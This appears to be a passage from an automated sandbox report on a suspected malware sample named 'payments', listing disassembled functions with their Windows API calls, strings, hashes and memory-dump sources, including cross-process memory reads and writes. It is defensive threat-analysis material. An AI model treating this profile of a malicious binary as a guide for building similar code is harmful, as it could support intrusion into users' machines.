                                                                                                                          • API ID: CrackInternet_memset
                                                                                                                          • String ID: |
                                                                                                                          • API String ID: 1413715105-2343686810
                                                                                                                          • Opcode ID: 0a5ca5bd96c0a54dd0bc94bde86ff280eb22c63249fb8a0a5280225cd2f336de
                                                                                                                          • Instruction ID: a1bc13daf88a301309bda22c45f56cde38b77fedd00587660812150a21a3342b
                                                                                                                          • Opcode Fuzzy Hash: 0a5ca5bd96c0a54dd0bc94bde86ff280eb22c63249fb8a0a5280225cd2f336de
                                                                                                                          • Instruction Fuzzy Hash: E1313971C00119AFCF01EFA5CC85AEEBFB9FF18704F104019F915A6166EB35AA06DBA0
                                                                                                                          Function 00CF975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00CF980E
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CF984A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                          • String ID: static
                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                          • Opcode ID: 52c69d821a770ee584853b6d3061abf80b70e73d088547fa51213424a473f681
                                                                                                                          • Instruction ID: fbac50465f05f4b0ad734603de740363af234e7ded45c7703ef5ba9bf23a47ff
                                                                                                                          • Opcode Fuzzy Hash: 52c69d821a770ee584853b6d3061abf80b70e73d088547fa51213424a473f681
                                                                                                                          • Instruction Fuzzy Hash: 7B318D71110208AEEF109F64CC80BFB73B9FF59764F008619FAA9C7190DA30AD81DB61
                                                                                                                          Function 00CCC2DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00CCC2F7
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CCC331
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: 448d580d1e6b23657240f4603f4878e2041d705eaab07d63027a6f3f68695176
                                                                                                                          • Instruction ID: 902682df2b30a84e8dbe3ae8d1fed3cc85caafd02d56f53c8835814a13ee5332
                                                                                                                          • Opcode Fuzzy Hash: 448d580d1e6b23657240f4603f4878e2041d705eaab07d63027a6f3f68695176
                                                                                                                          • Instruction Fuzzy Hash: 8E21E672D00215ABCF11AF98D8C1EFEB779EF88700B158119E919A72A0EB709D02D7A0
                                                                                                                          Function 00CD5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD51C6
                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CD5201
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                                          • Opcode ID: d7283d0cca74a7824301be16a8d0ff50e36f541cb77dfdad4c683a3428115e82
                                                                                                                          • Instruction ID: fc6a8eb34f559a779c1a7b45f17ea3232f47f6ff9a7563479a25340fa2c94b5d
                                                                                                                          • Opcode Fuzzy Hash: d7283d0cca74a7824301be16a8d0ff50e36f541cb77dfdad4c683a3428115e82
                                                                                                                          • Instruction Fuzzy Hash: 7D31E431A00705ABEB24CF99D845BAEBBF4EF45390F14401EEAA1E63A0D7709B48DB10
                                                                                                                          Function 00CE658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __snwprintf
                                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                          • API String ID: 2391506597-2584243854
                                                                                                                          • Opcode ID: 23bf400f8e178716ee87153735d3a573fb72e1a38da6617e95783585280ac9a7
                                                                                                                          • Instruction ID: fb8d38015991ab1204bf88bf9764a811f049078bad69178d7b593288267f55bf
                                                                                                                          • Opcode Fuzzy Hash: 23bf400f8e178716ee87153735d3a573fb72e1a38da6617e95783585280ac9a7
                                                                                                                          • Instruction Fuzzy Hash: 7A21B171A10218AFCF11EFA5C886EEE77B9BF54740F000459F505AB181DB70EA45DBA5
                                                                                                                          Function 00CF955E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD7DB1: GetLocalTime.KERNEL32 ref: 00CD7DBE
                                                                                                                            • Part of subcall function 00CD7DB1: _wcsncpy.LIBCMT ref: 00CD7DF3
                                                                                                                            • Part of subcall function 00CD7DB1: _wcsncpy.LIBCMT ref: 00CD7E25
                                                                                                                            • Part of subcall function 00CD7DB1: _wcsncpy.LIBCMT ref: 00CD7E58
                                                                                                                            • Part of subcall function 00CD7DB1: _wcsncpy.LIBCMT ref: 00CD7E9A
                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CF95F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsncpy$LocalMessageSendTime
                                                                                                                          • String ID: @U=u$SysDateTimePick32
                                                                                                                          • API String ID: 2466184910-2530228043
                                                                                                                          • Opcode ID: 8c1d4f8a1b7fcce11f345ba8a4c499bf24789180f5a59b0bd0524a6ff8fbf629
                                                                                                                          • Instruction ID: f6912c0889a77e33a588badf5fbd1c2bcf4c23d7990b8bfbebf7002d50b411c7
                                                                                                                          • Opcode Fuzzy Hash: 8c1d4f8a1b7fcce11f345ba8a4c499bf24789180f5a59b0bd0524a6ff8fbf629
                                                                                                                          • Instruction Fuzzy Hash: 6721D67134020C6FEF629E54CC82FFE336AEB44754F104615FA51AB2D0D6B1ED4197A1
                                                                                                                          Function 00CCBB97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CCBBB0
                                                                                                                            • Part of subcall function 00CD422F: GetWindowThreadProcessId.USER32(?,?), ref: 00CD425A
                                                                                                                            • Part of subcall function 00CD422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CCBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00CD426A
                                                                                                                            • Part of subcall function 00CD422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CCBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00CD4280
                                                                                                                            • Part of subcall function 00CD430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCBC08,?,?,00000034,00000800,?,00000034), ref: 00CD4335
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00CCBC17
                                                                                                                            • Part of subcall function 00CD42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00CD4300
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 1045663743-2594219639
                                                                                                                          • Opcode ID: c36a2afa51377e2c3222699d0814b196f7d5d314390eea24eb11a5c48c4630e3
                                                                                                                          • Instruction ID: e306822831689b0bdf01defe643c4eede91d427c8b9a7b8578afff409f197d90
                                                                                                                          • Opcode Fuzzy Hash: c36a2afa51377e2c3222699d0814b196f7d5d314390eea24eb11a5c48c4630e3
                                                                                                                          • Instruction Fuzzy Hash: 91215E31901228ABDF15ABA8DC85FDEBBB9FF04350F104196F654A7190DB705E45DBA0
                                                                                                                          Function 00CF93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CF945C
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF9467
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: Combobox
                                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                                          • Opcode ID: 2d42c4c8efcd9b0a3ce36ba8508b3396a92b7b4254b49ae67916fd1e673c35cd
                                                                                                                          • Instruction ID: 9ec1bbcea7800113d2f9c93ede7440b74c918a8866d212990ad8bf87802ee116
                                                                                                                          • Opcode Fuzzy Hash: 2d42c4c8efcd9b0a3ce36ba8508b3396a92b7b4254b49ae67916fd1e673c35cd
                                                                                                                          • Instruction Fuzzy Hash: 9D11B27130020D6FEF519E54DC81FFB3B6EEB983A4F104125FA29972A0D6319D529B61
                                                                                                                          Function 00CFC3DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 0-2594219639
                                                                                                                          • Opcode ID: 516fb5d3e0845bb57c939846bbc033900ae8376ce7a01b1f1f69fda36706db85
                                                                                                                          • Instruction ID: 8800d0c5670c1472b517931abe17e6c27d6ed5f4fa6a8d2a5273afb3d3ba6c89
                                                                                                                          • Opcode Fuzzy Hash: 516fb5d3e0845bb57c939846bbc033900ae8376ce7a01b1f1f69fda36706db85
                                                                                                                          • Instruction Fuzzy Hash: 9611D03534021CBEEF508F64CEA5FB93BA4EB05300F108111FB26EA1D0D670DA10EB66
                                                                                                                          Function 00CCD4F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91052
                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCD54E
                                                                                                                          • _strlen.LIBCMT ref: 00CCD559
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout_strlen
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 2777139624-2594219639
                                                                                                                          • Opcode ID: 5920da9b261e635b67b6acee186cb6fcec50ebfb6525629a2182597c54d9f78d
                                                                                                                          • Instruction ID: b9cf62dcdb11e2dab4857bba958aec94c41733a3b8645581c4a187fbe4e33316
                                                                                                                          • Opcode Fuzzy Hash: 5920da9b261e635b67b6acee186cb6fcec50ebfb6525629a2182597c54d9f78d
                                                                                                                          • Instruction Fuzzy Hash: 5B119171200205ABCF04BEA9DCD6EAE7BA89F55344F00443DF5079B192DE709947A6A0
                                                                                                                          Function 00CF98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAD1BA
                                                                                                                            • Part of subcall function 00CAD17C: GetStockObject.GDI32(00000011), ref: 00CAD1CE
                                                                                                                            • Part of subcall function 00CAD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAD1D8
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00CF9968
                                                                                                                          • GetSysColor.USER32(00000012), ref: 00CF9982
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                          • String ID: static
                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                          • Opcode ID: beda577fb67a31b8a47ea134132105a7036146adfed1d5fa2524e9baa4a9a5dd
                                                                                                                          • Instruction ID: 214891b09ba274fbfd4b123725c343d70ac57d9658f705e7a8340e2537081f44
                                                                                                                          • Opcode Fuzzy Hash: beda577fb67a31b8a47ea134132105a7036146adfed1d5fa2524e9baa4a9a5dd
                                                                                                                          • Instruction Fuzzy Hash: 6B11267252020AAFDF05DFB8CC45AFA7BA9FB08354F014628FA56E3250E774E951DB60
                                                                                                                          Function 00CD5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD52D5
                                                                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CD52F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                                          • Opcode ID: b40613b5a220c431910b9770199ded4f2dd818f1e4a00a63d5dcefbe8d0dacec
                                                                                                                          • Instruction ID: 374097a31a2b12779fcc6079b37be7dfbc5b4df96c4c0b0ff5451cc5ca4a5c4c
                                                                                                                          • Opcode Fuzzy Hash: b40613b5a220c431910b9770199ded4f2dd818f1e4a00a63d5dcefbe8d0dacec
                                                                                                                          • Instruction Fuzzy Hash: 4A11E675D01B14EBDB20DF9CD905BAD77B9AB05790F140016EA21E73A0D3B0EE04CBA0
                                                                                                                          Function 00CE4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CE4DF5
                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CE4E1E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                          • String ID: <local>
                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                          • Opcode ID: 6feec97b4b40242be7e663f281fd6712a1c9286a940d8b1fabd703ad46a93763
                                                                                                                          • Instruction ID: 4b16c0d55e72fd9699e1cf5393c23562c13efe35c2901453b9da411c095d4528
                                                                                                                          • Opcode Fuzzy Hash: 6feec97b4b40242be7e663f281fd6712a1c9286a940d8b1fabd703ad46a93763
                                                                                                                          • Instruction Fuzzy Hash: D311AC705012A1FBDB298F63CC89EFBFAA8FF06755F10822AF52596180D7706A41C6F0
                                                                                                                          Function 00CFB1DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,?,?,?), ref: 00CFB22B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: 3d157b1000c537b382835f93e261fdbf2c26aaf5ac05d650a4e6528cf30348a6
                                                                                                                          • Instruction ID: 1e2f3e62beb773a9e86ec5af33a75fe8fce59c5ffbd8a7b6853b16f1f3dcccd4
                                                                                                                          • Opcode Fuzzy Hash: 3d157b1000c537b382835f93e261fdbf2c26aaf5ac05d650a4e6528cf30348a6
                                                                                                                          • Instruction Fuzzy Hash: 7121CF7960020EEF8F05DF98C8808AE7BBAFB4D340B004154FE16A3320D731AE21DBA1
                                                                                                                          Function 00CF92B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00CF9327
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u$button
                                                                                                                          • API String ID: 3850602802-1762282863
                                                                                                                          • Opcode ID: e010ed9603a0d406bfc51994a163b7fea27cd171db0e62fda14d93abd6939157
                                                                                                                          • Instruction ID: b2a2f82af8a041f95af817b461ee9b5857db7e8496b21bb7d947ed3a87189ad2
                                                                                                                          • Opcode Fuzzy Hash: e010ed9603a0d406bfc51994a163b7fea27cd171db0e62fda14d93abd6939157
                                                                                                                          • Instruction Fuzzy Hash: 9C118B72150209ABDF118E64CC41FFA376AFF08364F150214FB65A72A0D776E865AB61
                                                                                                                          Function 00CFA587 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00CFA5D3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
